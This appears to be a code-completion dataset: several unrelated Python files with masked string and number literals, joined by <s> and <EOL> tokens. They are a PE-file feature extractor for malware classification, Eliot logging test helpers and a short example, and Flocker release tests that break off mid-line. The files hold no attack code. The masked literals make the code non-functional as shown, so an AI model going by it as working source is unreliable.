            extracted_dense['<STR_LIT>'] = len(pe.DIRECTORY_ENTRY_IMPORT)
            num_imported_symbols = <NUM_LIT:0>
            for module in pe.DIRECTORY_ENTRY_IMPORT:
                num_imported_symbols += len(module.imports)
            extracted_dense['<STR_LIT>'] = num_imported_symbols
        # Bound-import table, same shape as above.
        if hasattr(pe, '<STR_LIT>'):
            extracted_dense['<STR_LIT>'] = len(pe.DIRECTORY_ENTRY_BOUND_IMPORT)
            num_imported_symbols = <NUM_LIT:0>
            for module in pe.DIRECTORY_ENTRY_BOUND_IMPORT:
                num_imported_symbols += len(module.entries)
            extracted_dense['<STR_LIT>'] = num_imported_symbols

        # Export table: count plus a de-duplicated, lower-cased symbol list.
        if hasattr(pe, '<STR_LIT>'):
            extracted_dense['<STR_LIT>'] = len(pe.DIRECTORY_ENTRY_EXPORT.symbols)
            symbol_set = set()
            for symbol in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                symbol_info = '<STR_LIT>'
                if (not symbol.name):
                    symbol_info = '<STR_LIT>' + str(symbol.ordinal)
                else:
                    symbol_info = '<STR_LIT>' + symbol.name
                symbol_set.add(convertToUTF8('<STR_LIT:%s>' % (symbol_info)).lower())
            extracted_sparse['<STR_LIT>'] = list(symbol_set)
        # Imported symbols as "dll + symbol" strings.
        if hasattr(pe, '<STR_LIT>'):
            symbol_set = set()
            for module in pe.DIRECTORY_ENTRY_IMPORT:
                for symbol in module.imports:
                    symbol_info = '<STR_LIT>'
                    if symbol.import_by_ordinal is True:
                        symbol_info = '<STR_LIT>' + str(symbol.ordinal)
                    else:
                        symbol_info = '<STR_LIT>' + symbol.name
                    if symbol.bound:
                        symbol_info += '<STR_LIT>' + str(symbol.bound)
                    symbol_set.add(convertToUTF8('<STR_LIT>' % (module.dll, symbol_info)).lower())
            extracted_sparse['<STR_LIT>'] = list(symbol_set)

        if (len(pe.sections) >= <NUM_LIT:2>):
            extracted_dense['<STR_LIT>'] = pe.sections[<NUM_LIT:1>].Misc_VirtualSize
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.SizeOfImage
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.SizeOfCode
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.SizeOfInitializedData
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.SizeOfUninitializedData
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.MajorLinkerVersion
        extracted_dense['<STR_LIT>'] = pe.OPTIONAL_HEADER.MinorLinkerVersion
        extracted_dense['<STR_LIT>'] = <NUM_LIT:1> if pe.is_driver() else <NUM_LIT:0>
        extracted_dense['<STR_LIT>'] = <NUM_LIT:1> if pe.is_exe() else <NUM_LIT:0>
        extracted_dense['<STR_LIT>'] = <NUM_LIT:1> if pe.is_dll() else <NUM_LIT:0>
        extracted_dense['<STR_LIT>'] = <NUM_LIT:1>
        if pe.FILE_HEADER.Machine != <NUM_LIT>:
            extracted_dense['<STR_LIT>'] = <NUM_LIT:0>
        extracted_dense['<STR_LIT>'] = pe.FILE_HEADER.Characteristics

        # Sizes of selected data directories.
        # NOTE(review): the dict's values are immediately overwritten by
        # pefile.DIRECTORY_ENTRY[idx] on the next line -- only the keys
        # (indices) matter here; looks like dead data, confirm intent.
        datadirs = {<NUM_LIT:0>: '<STR_LIT>', <NUM_LIT:1>: '<STR_LIT>', <NUM_LIT:2>: '<STR_LIT>', <NUM_LIT:5>: '<STR_LIT>', <NUM_LIT:12>: '<STR_LIT>'}
        for idx, datadir in datadirs.items():
            datadir = pefile.DIRECTORY_ENTRY[idx]
            if len(pe.OPTIONAL_HEADER.DATA_DIRECTORY) <= idx:
                continue
            directory = pe.OPTIONAL_HEADER.DATA_DIRECTORY[idx]
            extracted_dense['<STR_LIT>' % datadir] = directory.Size

        # Per-section stats plus totals for executable-flagged sections.
        section_flags = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
        rawexecsize = <NUM_LIT:0>
        vaexecsize = <NUM_LIT:0>
        for sec in pe.sections:
            if not sec:
                continue
            for char in section_flags:
                if hasattr(sec, char):
                    rawexecsize += sec.SizeOfRawData
                    vaexecsize += sec.Misc_VirtualSize
                    break
            secname = convertToAsciiNullTerm(sec.Name).lower()
            secname = secname.replace('<STR_LIT:.>', '<STR_LIT>')
            extracted_dense['<STR_LIT>' % secname] = sec.get_entropy()
            extracted_dense['<STR_LIT>' % secname] = sec.PointerToRawData
            extracted_dense['<STR_LIT>' % secname] = sec.SizeOfRawData
            extracted_dense['<STR_LIT>' % secname] = sec.Misc_VirtualSize
        extracted_dense['<STR_LIT>'] = vaexecsize
        extracted_dense['<STR_LIT>'] = rawexecsize

        warnings = pe.get_warnings()
        if (warnings):
            extracted_dense['<STR_LIT>'] = <NUM_LIT:1>
            extracted_sparse['<STR_LIT>'] = warnings
        else:
            extracted_dense['<STR_LIT>'] = <NUM_LIT:0>

        # Replace any still-unset sentinel with the default value and
        # record a warning for it.
        # NOTE(review): self.log() has no definition in this class --
        # would raise AttributeError when _verbose is True; confirm.
        for feature in self._dense_feature_list:
            if (extracted_dense[feature] == feature_not_found_flag):
                extracted_dense[feature] = feature_default_value
                if (self._verbose):
                    self.log('<STR_LIT>' % (feature, feature_default_value))
                self._warnings.append('<STR_LIT>' % (feature, feature_default_value))
        for feature in self._sparse_feature_list:
            if (extracted_sparse[feature] == feature_not_found_flag):
                extracted_sparse[feature] = feature_default_value
                if (self._verbose):
                    self.log('<STR_LIT>' % (feature, feature_default_value))
                self._warnings.append('<STR_LIT>' % (feature, feature_default_value))
        self._dense_features = extracted_dense
        self._sparse_features = extracted_sparse
        return self.get_dense_features()


def convertToUTF8(s):
    # Return a UTF-8 byte string for unicode or decodable input, falling
    # back to str() for anything that cannot be decoded as UTF-8.
    if (isinstance(s, unicode)):
        return s.encode("<STR_LIT:utf-8>")
    try:
        u = unicode(s, "<STR_LIT:utf-8>")
    except:
        return str(s)
    utf8 = u.encode("<STR_LIT:utf-8>")
    return utf8


def convertToAsciiNullTerm(s):
    # Truncate at the first NUL (PE section names are NUL-padded) and
    # drop any non-ASCII bytes.
    s = s.split('<STR_LIT:\x00>', <NUM_LIT:1>)[<NUM_LIT:0>]
    return s.decode('<STR_LIT:ascii>', '<STR_LIT:ignore>')


def test():
    '''Smoke test: extract features from a sample file on disk.'''
    my_extractor = PEFileFeatures()
    with open('<STR_LIT>', '<STR_LIT:rb>') as f:
        print my_extractor.execute(f.read())


if __name__ == "<STR_LIT:__main__>":
    test()
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from unittest import SkipTest <EOL> from functools import wraps <EOL> from pyrsistent import PClass , field <EOL> from . _action import ( <EOL> ACTION_STATUS_FIELD , <EOL> ACTION_TYPE_FIELD , <EOL> STARTED_STATUS , <EOL> FAILED_STATUS , <EOL> SUCCEEDED_STATUS , <EOL> ) <EOL> from . _message import MESSAGE_TYPE_FIELD , TASK_LEVEL_FIELD , TASK_UUID_FIELD <EOL> from . _output import MemoryLogger <EOL> from . import _output <EOL> COMPLETED_STATUSES = ( FAILED_STATUS , SUCCEEDED_STATUS ) <EOL> def issuperset ( a , b ) : <EOL> """<STR_LIT>""" <EOL> aItems = a . items ( ) <EOL> return all ( pair in aItems for pair in b . items ( ) ) <EOL> def assertContainsFields ( test , message , fields ) : <EOL> """<STR_LIT>""" <EOL> messageSubset = dict ( [ ( key , value ) for key , value in message . items ( ) <EOL> if key in fields ] ) <EOL> test . assertEqual ( messageSubset , fields ) <EOL> class LoggedAction ( PClass ) : <EOL> """<STR_LIT>""" <EOL> startMessage = field ( mandatory = True ) <EOL> endMessage = field ( mandatory = True ) <EOL> children = field ( mandatory = True ) <EOL> def __new__ ( cls , startMessage , endMessage , children ) : <EOL> return PClass . __new__ ( cls , startMessage = startMessage , <EOL> endMessage = endMessage , children = children ) <EOL> @ property <EOL> def start_message ( self ) : <EOL> return self . startMessage <EOL> @ property <EOL> def end_message ( self ) : <EOL> return self . endMessage <EOL> @ classmethod <EOL> def fromMessages ( klass , uuid , level , messages ) : <EOL> """<STR_LIT>""" <EOL> startMessage = None <EOL> endMessage = None <EOL> children = [ ] <EOL> levelPrefix = level [ : - <NUM_LIT:1> ] <EOL> for message in messages : <EOL> if message [ TASK_UUID_FIELD ] != uuid : <EOL> continue <EOL> messageLevel = message [ TASK_LEVEL_FIELD ] <EOL> if messageLevel [ : - <NUM_LIT:1> ] == levelPrefix : <EOL> status = message . 
get ( ACTION_STATUS_FIELD ) <EOL> if status == STARTED_STATUS : <EOL> startMessage = message <EOL> elif status in COMPLETED_STATUSES : <EOL> endMessage = message <EOL> else : <EOL> children . append ( LoggedMessage ( message ) ) <EOL> elif ( len ( messageLevel ) == len ( levelPrefix ) + <NUM_LIT:2> and <EOL> messageLevel [ : - <NUM_LIT:2> ] == levelPrefix and <EOL> messageLevel [ - <NUM_LIT:1> ] == <NUM_LIT:1> ) : <EOL> child = klass . fromMessages ( <EOL> uuid , message [ TASK_LEVEL_FIELD ] , messages ) <EOL> children . append ( child ) <EOL> if startMessage is None or endMessage is None : <EOL> raise ValueError ( uuid , level ) <EOL> return klass ( startMessage , endMessage , children ) <EOL> from_messages = fromMessages <EOL> @ classmethod <EOL> def ofType ( klass , messages , actionType ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for message in messages : <EOL> if ( message . get ( ACTION_TYPE_FIELD ) == actionType . action_type and <EOL> message [ ACTION_STATUS_FIELD ] == STARTED_STATUS ) : <EOL> result . append ( klass . fromMessages ( message [ TASK_UUID_FIELD ] , <EOL> message [ TASK_LEVEL_FIELD ] , <EOL> messages ) ) <EOL> return result <EOL> of_type = ofType <EOL> def descendants ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in self . children : <EOL> yield child <EOL> if isinstance ( child , LoggedAction ) : <EOL> for descendant in child . descendants ( ) : <EOL> yield descendant <EOL> @ property <EOL> def succeeded ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . endMessage [ ACTION_STATUS_FIELD ] == SUCCEEDED_STATUS <EOL> class LoggedMessage ( PClass ) : <EOL> """<STR_LIT>""" <EOL> message = field ( mandatory = True ) <EOL> def __new__ ( cls , message ) : <EOL> return PClass . __new__ ( cls , message = message ) <EOL> @ classmethod <EOL> def ofType ( klass , messages , messageType ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> for message in messages : <EOL> if message . get ( MESSAGE_TYPE_FIELD ) == messageType . 
message_type : <EOL> result . append ( klass ( message ) ) <EOL> return result <EOL> of_type = ofType <EOL> class UnflushedTracebacks ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def validateLogging ( assertion , * assertionArgs , ** assertionKwargs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( function ) : <EOL> @ wraps ( function ) <EOL> def wrapper ( self , * args , ** kwargs ) : <EOL> skipped = False <EOL> kwargs [ "<STR_LIT>" ] = logger = MemoryLogger ( ) <EOL> self . addCleanup ( logger . validate ) <EOL> def checkForUnflushed ( ) : <EOL> if not skipped and logger . tracebackMessages : <EOL> raise UnflushedTracebacks ( logger . tracebackMessages ) <EOL> self . addCleanup ( checkForUnflushed ) <EOL> if assertion is not None : <EOL> self . addCleanup ( lambda : skipped or assertion ( <EOL> self , logger , * assertionArgs , ** assertionKwargs ) ) <EOL> try : <EOL> return function ( self , * args , ** kwargs ) <EOL> except SkipTest : <EOL> skipped = True <EOL> raise <EOL> return wrapper <EOL> return decorator <EOL> validate_logging = validateLogging <EOL> def capture_logging ( assertion , * assertionArgs , ** assertionKwargs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( function ) : <EOL> @ validate_logging ( assertion , * assertionArgs , ** assertionKwargs ) <EOL> @ wraps ( function ) <EOL> def wrapper ( self , * args , ** kwargs ) : <EOL> logger = kwargs [ "<STR_LIT>" ] <EOL> current_logger = _output . _DEFAULT_LOGGER <EOL> _output . _DEFAULT_LOGGER = logger <EOL> def cleanup ( ) : <EOL> _output . _DEFAULT_LOGGER = current_logger <EOL> self . addCleanup ( cleanup ) <EOL> return function ( self , logger ) <EOL> return wrapper <EOL> return decorator <EOL> def assertHasMessage ( testCase , logger , messageType , fields = None ) : <EOL> """<STR_LIT>""" <EOL> if fields is None : <EOL> fields = { } <EOL> messages = LoggedMessage . ofType ( logger . messages , messageType ) <EOL> testCase . 
assertTrue ( messages , "<STR_LIT>" % ( messageType , ) ) <EOL> loggedMessage = messages [ <NUM_LIT:0> ] <EOL> assertContainsFields ( testCase , loggedMessage . message , fields ) <EOL> return loggedMessage <EOL> def assertHasAction ( testCase , logger , actionType , succeeded , startFields = None , <EOL> endFields = None ) : <EOL> """<STR_LIT>""" <EOL> if startFields is None : <EOL> startFields = { } <EOL> if endFields is None : <EOL> endFields = { } <EOL> actions = LoggedAction . ofType ( logger . messages , actionType ) <EOL> testCase . assertTrue ( actions , "<STR_LIT>" % ( actionType , ) ) <EOL> action = actions [ <NUM_LIT:0> ] <EOL> testCase . assertEqual ( action . succeeded , succeeded ) <EOL> assertContainsFields ( testCase , action . startMessage , startFields ) <EOL> assertContainsFields ( testCase , action . endMessage , endFields ) <EOL> return action </s>
<s> from sys import stdout <EOL> from eliot import Message , to_file <EOL> to_file ( stdout ) <EOL> class Place ( object ) : <EOL> def __init__ ( self , name , contained = ( ) ) : <EOL> self . name = name <EOL> self . contained = contained <EOL> def visited ( self , people ) : <EOL> Message . log ( message_type = "<STR_LIT>" , <EOL> people = people , place = self . name ) <EOL> for thing in self . contained : <EOL> thing . visited ( people ) <EOL> def honeymoon ( family , destination ) : <EOL> Message . log ( message_type = "<STR_LIT>" , people = family ) <EOL> destination . visited ( family ) <EOL> honeymoon ( [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> Place ( "<STR_LIT>" , <EOL> [ Place ( "<STR_LIT>" , <EOL> [ Place ( "<STR_LIT>" ) , Place ( "<STR_LIT>" ) ] ) ] ) ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from hashlib import sha256 <EOL> from gzip import GzipFile <EOL> from StringIO import StringIO <EOL> import tempfile <EOL> from textwrap import dedent <EOL> from unittest import skipUnless , skipIf <EOL> from effect import sync_perform , ComposedDispatcher , base_dispatcher <EOL> from git import Repo <EOL> from hypothesis import given <EOL> from hypothesis . strategies import text , sampled_from <EOL> from requests . exceptions import HTTPError <EOL> from boto . s3 . website import RoutingRules , RoutingRule <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . python . procutils import which <EOL> from twisted . python . usage import UsageError <EOL> from . . release import ( <EOL> upload_python_packages , upload_packages , update_repo , <EOL> parse_routing_rules , publish_docs , Environments , <EOL> DocumentationRelease , DOCUMENTATION_CONFIGURATIONS , NotTagged , NotARelease , <EOL> calculate_base_branch , create_release_branch , <EOL> CreateReleaseBranchOptions , BranchExists , TagExists , <EOL> UploadOptions , create_pip_index , upload_pip_index , <EOL> update_license_file , <EOL> ) <EOL> from . . packaging import Distribution <EOL> from . . aws import FakeAWS , CreateCloudFrontInvalidation <EOL> from . . yum import FakeYum , yum_dispatcher <EOL> from flocker . testtools import TestCase <EOL> from testtools . matchers import AfterPreprocessing , Equals <EOL> FLOCKER_PATH = FilePath ( __file__ ) . parent ( ) . parent ( ) . parent ( ) <EOL> def hard_linking_possible ( ) : <EOL> """<STR_LIT>""" <EOL> scratch_directory = FilePath ( tempfile . mkdtemp ( ) ) <EOL> test_file = scratch_directory . child ( '<STR_LIT:src>' ) <EOL> test_file . touch ( ) <EOL> try : <EOL> os . link ( test_file . path , scratch_directory . child ( '<STR_LIT>' ) . path ) <EOL> return True <EOL> except : <EOL> return False <EOL> finally : <EOL> scratch_directory . 
remove ( ) <EOL> def MatchesRoutingRules ( rules ) : <EOL> """<STR_LIT>""" <EOL> return AfterPreprocessing ( RoutingRules . to_xml , <EOL> Equals ( RoutingRules ( rules ) . to_xml ( ) ) ) <EOL> class ParseRoutingRulesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_empty_config ( self ) : <EOL> """<STR_LIT:U+0020>""" <EOL> rules = parse_routing_rules ( { } , "<STR_LIT>" ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ ] ) ) <EOL> @ given ( <EOL> hostname = text ( ) , <EOL> replace = sampled_from ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ) <EOL> def test_add_hostname ( self , hostname , replace ) : <EOL> """<STR_LIT>""" <EOL> rules = parse_routing_rules ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { replace : "<STR_LIT>" } , <EOL> } , <EOL> } , hostname ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ** { replace : "<STR_LIT>" } <EOL> ) , <EOL> ] ) ) <EOL> @ given ( <EOL> hostname = text ( ) , <EOL> other_hostname = text ( ) , <EOL> replace = sampled_from ( [ "<STR_LIT>" , "<STR_LIT>" ] ) , <EOL> ) <EOL> def test_given_hostname ( self , hostname , replace , other_hostname ) : <EOL> """<STR_LIT>""" <EOL> rules = parse_routing_rules ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { replace : "<STR_LIT>" , "<STR_LIT>" : other_hostname } , <EOL> } , <EOL> } , hostname ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . 
then_redirect ( <EOL> hostname = other_hostname , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ** { replace : "<STR_LIT>" } <EOL> ) , <EOL> ] ) ) <EOL> @ given ( <EOL> hostname = text ( ) , <EOL> ) <EOL> def test_long_match_first ( self , hostname ) : <EOL> """<STR_LIT>""" <EOL> rules = parse_routing_rules ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } , <EOL> } , <EOL> } , hostname ) <EOL> self . assertThat ( rules , MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> replace_key = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ) , <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> replace_key = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ) , <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> hostname = hostname , <EOL> protocol = "<STR_LIT>" , <EOL> replace_key = "<STR_LIT>" , <EOL> http_redirect_code = <NUM_LIT> , <EOL> ) , <EOL> ] ) ) <EOL> class PublishDocsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def publish_docs ( self , aws , <EOL> flocker_version , doc_version , environment , <EOL> routing_config = { } ) : <EOL> """<STR_LIT>""" <EOL> sync_perform ( <EOL> ComposedDispatcher ( [ aws . 
get_dispatcher ( ) , base_dispatcher ] ) , <EOL> publish_docs ( flocker_version , doc_version , <EOL> environment = environment , <EOL> routing_config = routing_config ) ) <EOL> def test_copies_documentation ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> def test_copies_documentation_production ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } <EOL> } ) <EOL> self . 
publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> def test_deletes_removed_documentation ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . s3_buckets [ '<STR_LIT>' ] , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } ) <EOL> def test_updated_routing_rules ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING , <EOL> routing_config = { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT:replace>" } } , <EOL> } ) <EOL> self . assertThat ( <EOL> aws . routing_rules [ '<STR_LIT>' ] , <EOL> MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . 
then_redirect ( <EOL> replace_key = "<STR_LIT>" , <EOL> hostname = "<STR_LIT>" , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = "<STR_LIT>" , <EOL> ) , <EOL> ] ) ) <EOL> def test_updated_routing_rules_production ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> routing_config = { <EOL> "<STR_LIT>" : { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT:replace>" } } , <EOL> } ) <EOL> self . assertThat ( <EOL> aws . routing_rules [ '<STR_LIT>' ] , <EOL> MatchesRoutingRules ( [ <EOL> RoutingRule . when ( key_prefix = "<STR_LIT>" ) . then_redirect ( <EOL> replace_key = "<STR_LIT>" , <EOL> hostname = "<STR_LIT>" , <EOL> protocol = "<STR_LIT>" , <EOL> http_redirect_code = "<STR_LIT>" , <EOL> ) , <EOL> ] ) ) <EOL> def test_creates_cloudfront_invalidation_new_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . 
cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_trailing_index ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_removed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . 
